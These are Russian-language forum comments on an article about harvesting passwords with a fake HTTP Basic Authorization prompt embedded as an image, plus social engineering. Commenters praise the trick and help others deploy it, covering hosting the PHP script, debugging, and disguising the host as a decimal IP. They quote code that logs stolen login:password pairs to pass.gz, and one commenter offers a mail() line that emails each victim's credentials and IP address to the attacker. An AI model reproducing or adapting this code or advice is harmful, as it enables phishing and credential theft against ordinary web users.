Ааааа!!! Честно, у меня была такая идея! Даже нахожусь на этапе ее реализации, и вот - наткнулся на эту статью. ИМХО - это очень перспективное направление, в эту сторону можно думать. Хотя я бы не стал об этом слишком распространяться, глядишь - и будут меры принимать Отличная статья, спасибо.
Кстати, насчет решения. В Firefox, например, рядом с зоной авторизации показывается хост, на котором собственно лежит скрипт. И там, кажется, проблема с русскими кодировками в окошке - сложно вписать что-нибудь осмысленное. Но, к счастью, Firefox стоит у меньшинства
Это вообще не баг. И довольно старая вещь. Ничего с этого не поиметь. А забанить за такую картинку всегда можно, чтоб другим людям не мешали.
Егорыч+++, не баг, но "хак". На форумах - да. Но в Сети еще полно мест, куда можно вставить такую картинку, разведя на этом кучу лохов.
Но ведь, никто про баг и не говорил, это лишь "Basic Authorization" + СИ. Да, а есль в строку браузера написать IP, а ещё если не просто IP, а в десятиричной форме, как думаещь, сколько процентов людей, непоймут что это такое. Но ведь можно, развадить англоязычное население, а также, тех кто знает английский
Прочитал статью за что автору респект , но я кое-что не понял .Помогите разобраться куда этот скрипт в 1 способе вставлять насколько я понял в картинку но если так то как !
Вставь его, в твой любимый текстовый редактор, например Блокнот(Notepad), сохрани под именем 111.php и залей на хостинг, а вот с хостингом, тебе придётся разбираться самому, они все разные. Кстати тут, я это уже упомянал.
ну а если залить на холм.ру или юкоз.ру ? И что мне эту страничку надо будет раздовать людям у которых я хочу узнать пасс и если они зайдут то пасс будет?
Я добавил новый пункт Заметь: к статье, посмотри. Надеюсь после этого если ктото и будет задавать вопросы, они хотябы небудут повторятса.
Статья хорошая, молодец! Но у мну после ввода паролья и логина в картинке нифига не показывается что ваш логин тот и пароль этот а ту на форуме у тя показывает и еще pass.gz увеличивает байты ...окрываю а там точки в место пассов... не подскажешь в чем трабла?
Картинка может не показыаться, если нет поддержки GD в PHP, или может какая небудь левая версия, хз. А строку сохранения паса ты поставил после определения переменных или до Советую их поставить, куда небудь, в место действия else, чтобы сохнанялись только тогда когда ввели что небудь, в оба поля.
Я так понимаю смысл в том, что если длина логина меньше 3 символов или длина пароля меньше 1 символа то неавторизован. Но что-то я вбиваю и больше, а нифига. Не аффторизован, все время вылетает окошко снова и снова. Сначала грешил на фаерфокс, попробовал в экспорере - то же.
Статья хорошая. Мне понравилась. Только вот кажеться не совсем удобным: PHP: $fh=gzopen('pass.gz', 'a9');gzwrite($fh, "$login:$pass\n");gzclose($fh); Мне больше подошло что бы пас с логином, если его кто то введет приходил на мыло. Для этого можно вышеозначенную строчку заменить например на: PHP: mail("Ваше мыло@ya.ru","$login:$pass\n","(".$REMOTE_ADDR.")\n\n"); Логин и пас придут в теме письма, это полезно тк мыло будет зафлужено очень быстро. В теле письма будет ип человека. Кстати на рамблер не приходит,а на яндекс да, остальные не проверял. ЗЫ: строчка кода достаточна кривая, хотя и работает, лучше напишите свой вариант. Еще раз респект автору статьи. Всем удачи.